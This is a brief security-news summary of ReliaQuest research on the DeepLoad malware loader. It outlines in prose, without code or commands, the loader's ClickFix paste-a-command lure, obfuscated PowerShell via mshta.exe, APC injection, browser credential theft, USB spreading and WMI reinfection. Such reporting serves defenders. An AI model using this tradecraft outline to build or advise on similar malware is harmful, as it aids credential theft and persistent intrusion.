DeepLoad Loader Uses ClickFix Lure and WMI Persistence
🔒 ReliaQuest researchers detail a new malware loader, DeepLoad, distributed via an ClickFix social-engineering lure that tricks users into pasting PowerShell commands into the Windows Run dialog. The chain leverages mshta.exe to execute an obfuscated PowerShell loader that likely uses AI-assisted obfuscation and conceals its payload in a LockAppHost.exe process while disabling PowerShell history to reduce traces. DeepLoad compiles transient C# DLLs in Temp, uses APC injection to run shellcode in suspended trusted processes without writing decoded payloads to disk, steals browser credentials and sessions, drops a persistent malicious browser extension, copies itself to USB devices via deceptive shortcuts, and employs WMI event subscriptions to reinfect cleaned systems.